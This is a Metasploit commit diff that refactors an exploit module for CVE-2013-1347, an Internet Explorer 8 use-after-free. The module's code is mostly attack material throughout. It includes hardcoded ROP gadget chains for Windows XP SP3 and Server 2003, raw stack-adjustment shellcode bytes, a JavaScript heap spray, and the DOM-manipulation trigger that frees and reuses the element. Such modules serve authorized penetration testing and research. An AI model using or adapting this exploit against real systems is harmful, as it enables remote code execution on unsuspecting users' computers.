Land rapid7#1809, @wchen-r7's modification for ie_cgenericelement_uaf

jvazquez-r7 · jvazquez-r7 · commit bdd2287daf49 · 2013-05-08T16:21:11.000-05:00
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -1,5 +1,4 @@
 ##
-#
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -48,6 +47,7 @@ def initialize(info={})
 				[
 					[ 'CVE', '2013-1347' ],
 					[ 'OSVDB', '92993' ],
+					[ 'US-CERT-VU', '237655' ],
 					[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
 					[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
 				],
@@ -82,7 +82,6 @@ def initialize(info={})
 	end
 
 	def get_target(agent)
-		#If the user is already specified by the user, we'll just use that
 		return target if target.name != 'Automatic'
 
 		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
@@ -114,80 +113,16 @@ def get_target(agent)
 		return nil
 	end
 
-	def ie8_smil(my_target, p)
-
-		case my_target['Rop']
-		when :msvcrt
-			case my_target.name
-			when 'IE 8 on Windows XP SP3'
-				align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
-				xchg_esp  = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
-			when 'IE 8 on Windows Server 2003'
-				align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
-				xchg_esp  = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
-			end
-		else
-			align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
-			xchg_esp  = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
-		end
-
-		padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
-		js_payload = Rex::Text.to_unescape(p)
-
-		js = %Q|
-		unicorn = unescape("ABCD");
-		unicorn2 = unescape("EEEE");
-		for (i=0; i < 2; i++) {
-			unicorn += unescape("ABCD");
-		}unicorn += unescape("AB");
-
-		unicorn += unescape("#{js_payload}");
-
-		animvalues = unescape("#{align_esp}");
-
-		for (i=0; i < 0x70/4; i++) {
-			if (i == 0x70/4-1) {
-				animvalues += unescape("#{xchg_esp}");
-			}
-			else {
-				animvalues += unescape("#{align_esp}");
-			}
-		}
-
-		animvalues += unicorn;
-
-		for(i = 0; i < 13; i++) {
-			animvalues += ";red";
-		}
-		|
-
-		if datastore['OBFUSCATE']
-			js = ::Rex::Exploitation::JSObfu.new(js)
-			js.obfuscate
-		end
-
-		return js
-	end
-
-	def junk(n=4)
-		return rand_text_alpha(n).unpack("V")[0].to_i
-	end
-
-	def nop
-		return make_nops(4).unpack("V")[0].to_i
-	end
-
 	def get_payload(t, cli)
-		code = payload.encoded
-
-		# No rop. Just return the payload.
-		return code if t['Rop'].nil?
+		rop_payload = ''
 
 		case t['Rop']
 		when :msvcrt
-			case t.name
-			when 'IE 8 on Windows XP SP3'
-				rop_gadgets =
+			algin  = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+			chain = ''
+
+			if t.name == 'IE 8 on Windows XP SP3'
+				chain =
 				[
 					0x77c1e844, # POP EBP # RETN [msvcrt.dll]
 					0x77c1e844, # skip 4 bytes [msvcrt.dll]
@@ -212,8 +147,12 @@ def get_payload(t, cli)
 					0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
 					0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
 				].pack("V*")
-			when 'IE 8 on Windows Server 2003'
-				rop_gadgets =
+
+			elsif t.name == 'IE 8 on Windows Server 2003'
+				junk = rand_text_alpha(4).unpack("V")[0].to_i
+				nop  = make_nops(4).unpack("V")[0].to_i
+
+				chain =
 				[
 					0x77bb2563, # POP EAX # RETN
 					0x77ba1114, # <- *&VirtualProtect()
@@ -241,48 +180,39 @@ def get_payload(t, cli)
 					0x77be6591  # PUSHAD # ADD AL,0EF # RETN
 				].pack("V*")
 			end
-		else
-			rop_gadgets =
-			[
-				0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
-				0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
-				0x7c3415a2, # JMP [EAX] [msvcr71.dll]
-				0xffffffff,
-				0x7c376402, # skip 4 bytes [msvcr71.dll]
-				0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
-				0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
-				0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-				0x7c344f87, # POP EDX # RETN [msvcr71.dll]
-				0xffffffc0, # Value to negate, will become 0x00000040
-				0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
-				0x7c34d201, # POP ECX # RETN [msvcr71.dll]
-				0x7c38b001, # &Writable location [msvcr71.dll]
-				0x7c347f97, # POP EAX # RETN [msvcr71.dll]
-				0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-				0x7c345c30  # ptr to 'push esp #  ret ' [msvcr71.dll]
-				# rop chain generated with mona.py
-			].pack("V*")
-		end
 
-		rop_payload = rop_gadgets
-		case t['Rop']
-		when :msvcrt
-			rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+			rop_payload = chain + algin + payload.encoded
+
 		else
-			rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+			code  = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+			code << payload.encoded
+			code << rand_text_alpha(12000)
+
+			rop_payload = generate_rop_payload('java', code)
 		end
-		rop_payload << code
-		rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
 
 		return rop_payload
 	end
 
 	def load_exploit_html(my_target, cli)
+		case my_target['Rop']
+		when :msvcrt
+			case my_target.name
+			when 'IE 8 on Windows XP SP3'
+				align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
+				xchg_esp  = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
+			when 'IE 8 on Windows Server 2003'
+				align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
+				xchg_esp  = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
+			end
+		else
+			align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
+			xchg_esp  = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
+		end
+
+		padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
+		js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
 
-		p  = get_payload(my_target, cli)
-		js = ie8_smil(my_target, p)
 
 		html = %Q|
 		<!doctype html>
@@ -293,9 +223,10 @@ def load_exploit_html(my_target, cli)
 		</meta>
 
 		<script>
+		#{js_mstime_malloc}
+
 		function helloWorld()
 		{
-			#{js}
 			f0 = document.createElement('span');
 			document.body.appendChild(f0);
 			f1 = document.createElement('span');
@@ -306,21 +237,32 @@ def load_exploit_html(my_target, cli)
 			f2.appendChild(document.createElement('datalist'));
 			f1.appendChild(document.createElement('span'));
 			f1.appendChild(document.createElement('table'));
-			try{
-				f0.offsetParent=null;
-			}catch(e) {
 
-			}f2.innerHTML="";
+			try      { f0.offsetParent=null;}
+			catch(e) { }
+
+			f2.innerHTML = "";
 			f0.appendChild(document.createElement('hr'));
-			f1.innerHTML="";
+			f1.innerHTML = "";
 
 			CollectGarbage();
 
-			try {
-				a = document.getElementById('myanim');
-				a.values = animvalues;
+			sparkle = unescape("ABCD");
+			for (i=0; i < 2; i++) {
+				sparkle += unescape("ABCD");
 			}
-			catch(e) {}
+			sparkle += unescape("AB");
+			sparkle += unescape("#{js_payload}");
+
+			magenta = unescape("#{align_esp}");
+
+			for (i=0; i < 0x70/4; i++) {
+				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
+				else               { magenta += unescape("#{align_esp}"); }
+			}
+
+			magenta += sparkle;
+			mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 		}
 
 		</script>
@@ -341,7 +283,6 @@ def on_request_uri(cli, request)
 		print_status("Requesting: #{uri}")
 
 		my_target = get_target(agent)
-		# Avoid the attack if no suitable target found
 		if my_target.nil?
 			print_error("Browser not supported, sending 404: #{agent}")
 			send_not_found(cli)
@@ -355,4 +296,3 @@ def on_request_uri(cli, request)
 	end
 
 end
-
